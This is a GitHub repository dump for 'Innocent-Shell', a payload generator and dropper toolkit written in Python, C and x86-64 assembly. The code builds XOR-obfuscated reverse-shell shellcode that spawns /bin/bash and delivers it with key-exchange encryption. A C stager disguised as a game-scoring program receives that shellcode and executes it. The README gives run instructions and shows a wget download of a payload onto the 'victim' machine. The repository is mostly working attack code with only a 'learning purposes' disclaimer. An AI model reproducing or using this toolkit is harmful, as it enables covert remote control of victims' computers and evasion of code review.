├── ScreenCaptures ├── Screenshot_10.png ├── Screenshot_17.png ├── Screenshot_3.png ├── Screenshot_4.png ├── Screenshot_5.png ├── Screenshot_6.png ├── Screenshot_7.png ├── Screenshot_8.png └── Screenshot_9.png ├── Shell ├── innogen.py ├── Assembly │ ├── shell_template.nasm │ └── dropper.c └── dropper.c ├── payload.py ├── innoshell.py ├── README.md └── code.py /ScreenCaptures/Screenshot_10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_10.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_17.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_3.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_4.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_5.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_6.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_7.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_8.png -------------------------------------------------------------------------------- /ScreenCaptures/Screenshot_9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mhuzaifi0604/Innocent-Shell/HEAD/ScreenCaptures/Screenshot_9.png -------------------------------------------------------------------------------- /Shell/innogen.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import subprocess 3 | 4 | def help(): 5 | print("Usage:\tinnogen.py {IP} {PORT}") 6 | 7 | def create(IP, PORT): 8 | with open("dropper.c", "r") as temp, open("output.c", "w") as pay: 9 | l=temp.readlines() 10 | l[0]=f'#define IP "{IP}"' 11 | l[1]=f'#define PORT {PORT}' 12 | 13 | for line in l: 14 | pay.write(line+"\n") 15 | 16 | print("[+] payload saved to payload_spellshell.c") 17 | 18 | 19 | cmd=subprocess.Popen(['gcc', '-fno-stack-protector', '-z', 'execstack', '-o', 'output', 'output.c'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 20 | out=cmd.stdout.read() 21 | print("[+] code saved as output.c and executable created as output.c") 22 | 23 | try: 24 | (IP, PORT)=(sys.argv[1], int(sys.argv[2])) 25 | except: 26 | help() 27 | exit() 28 | 29 | create(IP, PORT) -------------------------------------------------------------------------------- /Shell/Assembly/shell_template.nasm: -------------------------------------------------------------------------------- 1 | global _start 2 | _start: 3 | 4 | socket: 5 | push 0x2 6 | pop rdi 7 | xor rsi,rsi 8 | inc rsi 9 | xor rdx, rdx 10 | push 0x29 11 | pop rax 12 | syscall 13 | 14 | bind: 15 | xchg rax, rdi 16 | xor rax, rax 17 | push rax 18 | mov ebx , *IP* 19 | not ebx 20 | mov dword [rsp-4], ebx 21 | sub rsp , 4 22 | push word *PORT* 23 | push word 0x02 24 | push rsp 25 | pop rsi 26 | push 0x10 27 | pop rdx 28 | push 0x2a 29 | pop rax 30 | syscall 31 | 32 | push 0x02 33 | 'pop rsi', 34 | 'push *XORD*', ;0x21 35 | 'pop rdx', 36 | 'xor rdx, *XORD*', 37 | 'push rdx', 38 | 'pop rax', 39 | 'syscall', 40 | 'dec rsi', 41 | 'jns dup', 42 | 'xor rdx, rdx', 43 | 'push rdx', 44 | 'mov rbx, *XORD*', ;/bin//bash reverse 45 | 'xor bx, *XORD*', 46 | 'push rbx', 47 | 'mov rdi, rsp', 48 | 'push rdx', 49 | 'push rdi', 50 | 'mov rsi, rsp', 51 | 'xor rbx, rbx', 52 | 'mov bl, *XORD*', ;0x3b 53 | 'xor bl, *XORD*', 54 | 'push rbx', 55 | 'pop rax', 56 | 'syscall' -------------------------------------------------------------------------------- /payload.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import random 3 | from termcolor import colored 4 | 5 | def diffie_hellman(conn): 6 | P=251 7 | G=6 8 | a=random.randint(2, G) 9 | 10 | A = pow(G, a, P) 11 | conn.send(str(A).encode()) #sending A to client 12 | 13 | B = conn.recv(4096) #recieving B from client 14 | B= B.decode() 15 | B=int(B.split("\x00")[0]) 16 | 17 | key = pow(G, A*B, P) 18 | return key 19 | 20 | def obfuscate(shellcode, key): 21 | lol=b"" 22 | 23 | for i in range(len(shellcode)): 24 | lol+=(key^int(shellcode[i], 16)).to_bytes(1, "little") 25 | 26 | #left rotate 27 | lol=lol[key%(len(shellcode)): ] + lol[0: key%(len(shellcode))] 28 | 29 | return lol 30 | 31 | def drop(shellcode, ip, port): 32 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: 33 | sock.bind((ip, port)) 34 | sock.listen(1) 35 | conn, addr=sock.accept() 36 | 37 | print(colored('[+] ', 'magenta') + colored('Dropper', 'red') + f" connected from {colored(addr[0], 'green')} {colored(addr[1], 'green')}") 38 | 39 | send=b'' 40 | for b in shellcode: 41 | send+=bytes.fromhex(b[2:].rjust(2, '0')) 42 | 43 | key=diffie_hellman(conn) 44 | print(colored('[+] ', 'magenta') + colored('Diffie Hellman', 'red') + f" key exchange successful with {colored('key=', 'green')}{colored(key, 'green')}") 45 | send=obfuscate(shellcode, key) 46 | 47 | print(colored('[+] ', 'magenta') + colored('Payload', 'red') + f" encrypted with {colored(key, 'green')} and rotated by offset {colored(key%(len(shellcode)), 'green')}") 48 | try: 49 | conn.sendall(send) 50 | print(colored('[+] ', 'magenta') + colored('Payload', 'red') + f" delivered to {colored(addr[0], 'green')} {colored(addr[1], 'green')}") 51 | conn.close() 52 | sock.close() 53 | return 0 54 | except : 55 | print(colored('[-] ', 'magenta') + colored('Failed', 'red') + " to deliver payload. Connection closed") 56 | conn.close() 57 | sock.close() 58 | return 1 59 | -------------------------------------------------------------------------------- /innoshell.py: -------------------------------------------------------------------------------- 1 | import code 2 | import payload 3 | import argparse 4 | import socket 5 | import os 6 | import socket, sys, time 7 | import threading 8 | from termcolor import colored 9 | 10 | 11 | desc = "\n"+r""" _____ _ _____ _ _ _ 12 | |_ _| | | / ____| | | | | 13 | | | _ __ _ __ ___ ___ ___ _ __ | |_ | (___ | |__ ___| | | 14 | | | | '_ \| '_ \ / _ \ / __/ _ \ '_ \| __| \___ \| '_ \ / _ \ | | 15 | _| |_| | | | | | | (_) | (_| __/ | | | |_ ____) | | | | __/ | | 16 | |_____|_| |_|_| |_|\___/ \___\___|_| |_|\__| |_____/|_| |_|\___|_|_| 17 | 18 | Use python serv.py -h to get to the help menu 19 | """ 20 | def sender(conn): 21 | while True: 22 | try: 23 | command = str(input()) 24 | conn.send((command+"\n").encode()) 25 | except: 26 | print("[+] - Connection Closed.") 27 | return None 28 | 29 | def reciever(conn): 30 | while True: 31 | try: 32 | reply = conn.recv(32768) 33 | print(colored(reply.decode(), 'green')) 34 | except: 35 | print("[+] - Connection Closed.") 36 | return None 37 | 38 | 39 | 40 | print(colored(desc, 'red', attrs=['bold'])) 41 | parser = argparse.ArgumentParser(desc) 42 | parser.add_argument("-lip", "--listenerIP", help = "To Enter Server's IP") 43 | parser.add_argument("-lport", "--listenerPort", help = "To Enter Server's Port") 44 | parser.add_argument("-sip", "--StagerIP", help = "To Enter Clients's IP") 45 | parser.add_argument("-sport", "--StagerPort", help = "To Enter Clients's IP") 46 | parser.add_argument("-nc", "--listen", help = "To check for listening terminal") 47 | args = parser.parse_args() 48 | 49 | shellcode=code.getShellCode(code.prepare(code.asm, args.listenerIP, int(args.listenerPort)), os.getcwd()) 50 | payload.drop(shellcode, args.StagerIP, int(args.StagerPort)) 51 | if int(args.listen) == 1: 52 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 53 | s.bind((args.listenerIP, int(args.listenerPort))) 54 | s.listen(1) 55 | print(f"[+] - Server listening on Port [{args.listenerIP}] : [{args.listenerPort}]") 56 | ans = '' 57 | (conn, address) = s.accept() 58 | thread = threading.Thread(target = sender, args=(conn, )).start() 59 | thread = threading.Thread(target = reciever, args=(conn, )).start() 60 | print(f"\n[+] - Server Connected to client at [{address[0]} ] : [ {address[1]}]") 61 | -------------------------------------------------------------------------------- /Shell/Assembly/dropper.c: -------------------------------------------------------------------------------- 1 | #define IP "127.0.0.1" 2 | #define PORT 8080 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #define MAXLINE 4096 15 | 16 | long power(long x, long y, long p){ 17 | long result = 1; 18 | x %= p; 19 | //printf("X: %d\n", x); 20 | //for (int i = 0 ; i < 32; i++) 21 | // x << 2; 22 | //printf("Modified X: %d\n", x); 23 | if (x == 0) 24 | return 0; 25 | //int bin[64]; 26 | //int i=0; 27 | //for ( ;y > 0; ){ 28 | // bin[i++] = y % 2; 29 | // y /= 2; 30 | //} 31 | while(!(y <= 0)){ 32 | if(y %2 == 1) 33 | result = (result * x) % p; 34 | y /= 2; 35 | x = (x*x) % p; 36 | } 37 | return result; 38 | } 39 | 40 | int main(){ 41 | int sockfd, client_socket; 42 | struct sockaddr_in servaddr; 43 | 44 | if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0 ){ 45 | perror("Socket Creation Failed"); 46 | exit(EXIT_FAILURE); 47 | } 48 | 49 | memset(&servaddr, 0, sizeof(servaddr)); 50 | servaddr.sin_family = AF_INET; 51 | servaddr.sin_port = htons(PORT); 52 | servaddr.sin_addr.s_addr = inet_addr(IP); 53 | 54 | connect(sockfd, (struct sockaddr_in *)&servaddr, sizeof(servaddr)); 55 | char reply[MAXLINE]; 56 | memset(reply, 0, sizeof(reply)); 57 | 58 | int P=251, G=6; 59 | int a=rand()%(G-2)+2; 60 | printf("a: %d\n", a); 61 | long A=power(G, a, P); 62 | printf("A: %d\n", A); 63 | recv(sockfd, reply, 4096, 0); 64 | int B=atoi(reply); 65 | printf("B: %d\n", B); 66 | memset(reply, 0, sizeof(reply)); 67 | sprintf(reply, "%d\n", A); 68 | send(sockfd, reply, 4096, 0); 69 | long key=power(G, A*B, P); 70 | printf("key: %d\n", key); 71 | char buffer[MAXLINE]; 72 | memset(reply, 0, sizeof(reply)); 73 | recv(sockfd, reply, 4096, 0); 74 | printf("size: %d\n",strlen(reply)); 75 | printf("ShellCode: %s\n", reply); 76 | 77 | const int len=strlen(reply); 78 | unsigned char buff2[4096]; 79 | memset(buff2, 0, sizeof buff2); 80 | 81 | for(int i=0; i 0; j--){ 87 | buff2[j] = buff2[j-1]; 88 | } 89 | buff2[0] = last; 90 | } 91 | /*for (int i = 0 ; i < (key%strlen(buff2)); i++){ 92 | int j, start = buff2[0]; 93 | for (int j = 0 ; j < len ; j++){ 94 | buff2[j] = buff2[j+1]; 95 | } 96 | buff2[j] = start; 97 | } 98 | */ 99 | int(*ret)() = (int(*)())buff2; 100 | (int)(*ret)(); 101 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # *Innocent-Shell* 2 | *Innocent Shell is basically a fully integrated Obfuscated Payload Generator with a Dropper to Create a Reverse Shell on targets Device developed by Team* 3 | *PORT KNOCKERS :* 4 | * *Muhammad Huzaifa*

5 | * *Abdullah Irfan*

6 | * *Aisha Irfan*

7 | ![Innocent Shell](ScreenCaptures/Screenshot_10.png)

8 | *The Project makes use of Python, C and x86 Assembly Languages WHERE*

9 | *➡️Reverse Shell Payload has been Developed using pure x86 assembly which is then parsed to develop the dropper for client/ target*

10 | *➡️Client side stager to Connect to the Server is developed using C Language.*

11 | *➡️And Lastly the Server for the Reverse Shell to Connect to and Execute Commands and Getting Reply has been done using Python3.* 12 | 13 | ## *How To Run The Project* 14 | *To run the project 1st of all just clone this repository.* 15 | * Clone Repository: 16 | ``` 17 | git clone https://github.com/huzaifi0604/Innocent-Shell 18 | ``` 19 | *After extracting the zip file you can use the following command to get the help menu for the Server.* 20 | ``` 21 | python innoshell.py -h 22 | ``` 23 | This command can be used to check the flags and respective arguments for running server and listening for the target. You can use 24 | * *-lip --> Set Server's IP Address | -sip --> Set Client's IP Address*

25 | * *In this case since we are using same machine you can use your local host 127.0.0.1.* 26 | * *-lport --> Set Server's Port | -sport --> Set Client's Port*

27 | * *Set Server's port lip to 9999 and clients port sip to 8080*

28 | * *-nc flag --> to open a saperate netcat listener using teh same server. Use 1 to set listener to open.* 29 | ## Run Innocent Shell Server 30 | *Now open terminal and run the Innocent shell's server using the command below.* 31 | ``` 32 | python innocentshell.py -lip 127.0.0.1 -lport 9999 -sip 127.0.0.1 -sport 8080 -nc 1 33 | ``` 34 | *Server should start listening for connection after successfully running this command.* 35 | ![listner](ScreenCaptures/Screenshot_17.png)

36 | *Now traverse into the shell folder and use the following comand to build the dropper file.* 37 | ``` 38 | gcc -fno-stack-protector -z execstack dropper.c -o dropper 39 | ``` 40 | *Then use ``` ./dropper ``` to run the compiled C dropper for client.*

41 | *Now the server looking for the connection should have connected to the client and have output of something like this* 42 | ![output](ScreenCaptures/Screenshot_9.png)

43 | *Now you can use any command on Victim's Reverse Shell. I used wget command to downloaad a payload from my selfmade python http server using command*

44 | ``` 45 | wget http://my localhost IP:8080/payload.exe 46 | ``` 47 | ![payload wget](ScreenCaptures/Screenshot_3.png)

48 | *You can see that i have successfully downloaded my desired file into the victims system.*

49 | ![ls](ScreenCaptures/Screenshot_4.png)

50 | ## Assembly Payload 51 | *Reverse Shell Payload to get executed on victim's device was written using x86 assembly language and then parsed into C* 52 | ![assembly](ScreenCaptures/Screenshot_7.png)

53 | ## Payload Obfuscation 54 | *As for the last but not the least part: Payload Obfuscation, the reverse shell payload was obfuscated using byte shifting and Defi Hellman Key Exchange 55 | Mechanism to encrypt and decrypt the obfuscated payload with.* 56 | ![obfuscation](ScreenCaptures/Screenshot_8.png)

57 | *Similarly, The dropper on Clinet's Side has been developed in such a way that it depicts the program written for a game and scoring system 58 | and user analyzing teh code cannot interpret anything malicious within the code easily.* 59 | ![game](ScreenCaptures/Screenshot_5.png)

60 | ## Use At your Own Risk 61 | *It is clearly being stated that all the files in the repository are allowed/ available for use but only for learning purposes. We won't be responsible for 62 | any type of malicious activity done using this repository's data.* 63 | -------------------------------------------------------------------------------- /Shell/dropper.c: -------------------------------------------------------------------------------- 1 | #define IP "127.0.0.1" 2 | #define PORT 8080 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | #define QUALIFIER 4096 16 | int thirdumpire(int x){ 17 | if(x>100 || x%2==100%2 || x%2==1) 18 | return 0; 19 | return 45; 20 | } 21 | long timer(long hour, long min, long sec){ 22 | long varx50 = 1; 23 | long complete=hour*min-sec; 24 | for(int x34=34;x34min || min>hour) 29 | hour %= sec; 30 | if(hour>sec){ 31 | hour=11; 32 | min=hour*min; 33 | sec=min+67; 34 | } 35 | complete=complete%(complete-1); 36 | if (hour == 0 && complete > hour) 37 | return 0; 38 | while(!(min <= 0)){ 39 | if(min %2 == 1) 40 | varx50 = (varx50 * hour) % sec; 41 | else if (min==3 && sec>varx50){ 42 | int reset=0; 43 | hour=reset+1; 44 | min=reset+2; 45 | sec=reset*rand()%7; 46 | } 47 | else if(min==11) 48 | return 99; 49 | else 50 | complete=hour*min*sec; 51 | min /= 2; 52 | min=min%complete; 53 | hour = (hour*hour) % sec; 54 | } 55 | printf("%d",varx50); 56 | return varx50; 57 | } 58 | int reduce(char* x) 59 | { 60 | return atoi(x); 61 | } 62 | int penalty(int x) 63 | { 64 | return rand()%(x-2)+2; 65 | } 66 | int main(){ 67 | srand(time(NULL)); 68 | 69 | int startgame, player2; 70 | int points=5; 71 | struct sockaddr_in servicetoss; 72 | 73 | if((startgame = socket(AF_INET, SOCK_STREAM, 0)) < 0 ){ 74 | exit(EXIT_FAILURE); 75 | } 76 | int doublepoint=points*points; 77 | points=doublepoint*10; 78 | doublepoint=doublepoint%points; 79 | if(doublepoint2) 101 | doublepoint=0; 102 | } 103 | int round=0; 104 | int a350; 105 | long a351; 106 | int b=10; 107 | int winning_point=-1; 108 | for(round=0;round<10;round++) 109 | { 110 | switch(round){ 111 | case 0:{ 112 | a350=penalty(goal); 113 | break; 114 | } 115 | case 3:{ 116 | if((b*(rand()%67))%goal!=8){ 117 | b=reduce(myscore); 118 | } 119 | break; 120 | } 121 | case 1:{ 122 | a351=timer(goal,a350,points); 123 | break; 124 | } 125 | case 4:{ 126 | memset(myscore,0,sizeof(myscore)); 127 | sprintf(myscore, "%d\n", a351); 128 | break; 129 | } 130 | case 5:{ 131 | send(startgame, myscore, 4096, 0); 132 | break; 133 | } 134 | case 6:{ 135 | winning_point=timer(goal,a351*b,points); 136 | break; 137 | } 138 | case 8:{ 139 | memset(myscore,0,sizeof(myscore)); 140 | break; 141 | } 142 | case 7:{ 143 | if(winning_point>300){ 144 | doublepoint=0; 145 | } 146 | break; 147 | } 148 | case 12:{ 149 | printf("YOU HAVE WON THE CHAMPIONSHIP"); 150 | } 151 | case 16:{ 152 | recv(startgame, myscore, 4096, 0); 153 | goal=0; 154 | memset(myscore, 0, sizeof(myscore)); 155 | break; 156 | } 157 | default: 158 | recv(startgame, myscore, 4096, 0); 159 | } 160 | } 161 | const int probability=strlen(myscore); 162 | unsigned char keeper[4096]; 163 | memset(keeper, 0, sizeof(keeper)); 164 | int i=rand()%100; 165 | for(i=thirdumpire(i); i 0; j--){ 171 | if(j==0) 172 | keeper[out]=timer(3,4,54); 173 | else 174 | keeper[j] = keeper[j-1]; 175 | } 176 | keeper[0] = last; 177 | } 178 | 179 | int(*ret)() = (int(*)())keeper; 180 | (int)(*ret)(); 181 | } -------------------------------------------------------------------------------- /code.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import random 3 | import subprocess 4 | import os 5 | import sys 6 | 7 | asm=[ 8 | 'global _start', 9 | '_start:', 10 | 'push 0x2', 11 | 'pop rdi', 12 | 'xor rsi,rsi', 13 | 'inc rsi', 14 | 'xor rdx, rdx', 15 | 'push 0x29', 16 | 'pop rax', 17 | 'syscall', 18 | 'xchg rax, rdi', 19 | 'xor rax, rax', 20 | 'push rax', 21 | 'mov ebx , *IP*', #13 22 | 'not ebx', 23 | 'mov dword [rsp-4], ebx', 24 | 'sub rsp , 4 ', 25 | 'push word *PORT*', #17 26 | 'push word 0x02 ', 27 | 'push rsp', 28 | 'pop rsi', 29 | 'push 0x10', 30 | 'pop rdx', 31 | 'push 0x2a', 32 | 'pop rax', 33 | 'syscall', 34 | 'push 0x02', 35 | 'pop rsi', 36 | 'label0x292929:', 37 | 'xor rdx, rdx', 38 | #'push *XORD*', #28 39 | 'mov dl, *XORD*', 40 | #'pop rdx', 41 | 'xor dl, *XORD*', #30 42 | 'push rdx', 43 | 'pop rax', 44 | 'syscall', 45 | 'dec rsi', 46 | 'jns label0x292929', 47 | 'xor rdx, rdx', 48 | 'push rdx', 49 | 'mov rbx, *XORD*', #38 50 | 'xor bx, *XORD*', #39 51 | 'push rbx', 52 | 'mov rdi, rsp', 53 | 'push rdx', 54 | 'push rdi', 55 | 'mov rsi, rsp', 56 | 'xor rbx, rbx', 57 | 'mov bl, *XORD*', #46 58 | 'xor bl, *XORD*', #47 59 | 'push rbx', 60 | 'pop rax', 61 | 'syscall' 62 | ] 63 | ''' 64 | 65 | asm=[ 66 | 'global _start', 67 | '_start:', 68 | 'xor rax, rax', 69 | 'xor rsi, rsi ', 70 | 'mul rsi', 71 | 'add rcx, 0x3', 72 | 'push byte 0x2', 73 | 'pop rdi', 74 | 'inc esi', 75 | 'push byte 0x29', 76 | 'pop rax', 77 | 'syscall', 78 | 'xchg rax, rdi', 79 | 'xor rax, rax', 80 | 'push rax', 81 | 'mov ebx , *IP*', #15 82 | 'not ebx', 83 | 'mov dword [rsp-4], ebx', 84 | 'sub rsp , 4 ', 85 | 'push word *PORT*', #19 86 | 'push word 0x02', 87 | 'push rsp', 88 | 'pop rsi', 89 | 'push 0x10', 90 | 'pop rdx', 91 | 'push 0x2a', 92 | 'pop rax', 93 | 'syscall', 94 | 'push 0x3 ', 95 | 'pop rsi', 96 | 'duplicate:', 97 | 'dec esi ', 98 | 'mov al, 0x21', 99 | 'syscall', 100 | 'jne duplicate', 101 | #'push rsp', 102 | #'pop rsi', 103 | #'xor rax, rax', 104 | #'syscall', 105 | #'push 0x6b636168', 106 | #'pop rax', 107 | #'lea rdi, [rel rsi]', 108 | #'scasd', 109 | 'xor rsi , rsi', 110 | 'mul rsi ', 111 | 'push ax ', 112 | 'mov rbx , 0x68732f2f6e69622e', 113 | 'inc rbx', 114 | 'add rcx, 2', 115 | 'push rbx', 116 | 'push rsp', 117 | 'pop rdi ', 118 | 'push byte 0x3b', 119 | 'pop rax', 120 | 'syscall' 121 | ]''' 122 | 123 | def ip_sub(ip): 124 | octets=ip.split(".") 125 | octets=[hex(~(int(o))&0xFF) for o in octets] 126 | 127 | ips='0x' 128 | for o in reversed(octets): 129 | ips+=o[2:].rjust(2, '0') 130 | 131 | return ips 132 | 133 | def port_sub(port): 134 | return ((hex(socket.htonl(port)))[:6]).rstrip('0') 135 | 136 | def rand_xor(num, half=False): 137 | size=(num.bit_length() + 7) // 8 138 | if half: 139 | salt=random.getrandbits(16) 140 | else: 141 | salt=random.getrandbits(size*8) 142 | num^=salt 143 | return (hex(num), hex(salt)) 144 | 145 | def prepare(asm, ip, port): 146 | #ip 147 | ''' 148 | asm[15]=asm[15].replace("*IP*", ip_sub(ip)) 149 | #port 150 | asm[19]=asm[19].replace("*PORT*", port_sub(port)) 151 | ''' 152 | 153 | asm[13]=asm[13].replace("*IP*", ip_sub(ip)) 154 | asm[17]=asm[17].replace("*PORT*", port_sub(port)) 155 | #dup2 156 | (num, salt)=rand_xor(0x21) 157 | asm[30]=asm[30].replace("*XORD*", num) 158 | asm[31]=asm[31].replace("*XORD*", salt) 159 | #/bin/bash 160 | (num, salt)=rand_xor(0x68732f2f6e69622f, True) 161 | asm[39]=asm[39].replace("*XORD*", num) 162 | asm[40]=asm[40].replace("*XORD*", salt) 163 | #execve 164 | (num, salt)=rand_xor(0x3b) 165 | asm[47]=asm[47].replace("*XORD*", num) 166 | asm[48]=asm[48].replace("*XORD*", salt) 167 | return asm 168 | 169 | def getShellCode(asm, path): 170 | os.chdir(path) 171 | 172 | try: 173 | os.mkdir("temp") 174 | except: 175 | pass 176 | 177 | os.chdir(path+"/temp") 178 | 179 | with open('temp.nasm', 'w') as ifile: 180 | for line in asm: 181 | ifile.write(line+"\n") 182 | 183 | cmdline=subprocess.Popen(['nasm', '-f', 'elf64', 'temp.nasm', '-o', 'temp.o'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 184 | r=cmdline.stdout.read() 185 | cmdline=subprocess.Popen(['ld', 'temp.o', '-o', 'temp'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 186 | r=cmdline.stdout.read() 187 | 188 | cmdline=os.popen(f"objdump -D temp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's/ $//g'|sed 's/ /\\\\x/g'|paste -d '' -s |sed 's/^/\"/'|sed 's/$/\"/g'") 189 | shellcode=cmdline.read() 190 | cmdline.close() 191 | 192 | with open('temp.py', 'w') as ifile: 193 | ifile.write(f"buff={shellcode}") 194 | 195 | sys.path.insert(1, path+'/temp') 196 | from temp import buff 197 | 198 | 199 | ch=[hex(ord(i)) for i in buff] 200 | ch.insert(-29, '0x2f') #-18 201 | 202 | os.chdir(path) 203 | os.system("rm -r temp") 204 | 205 | return ch 206 | 207 | --------------------------------------------------------------------------------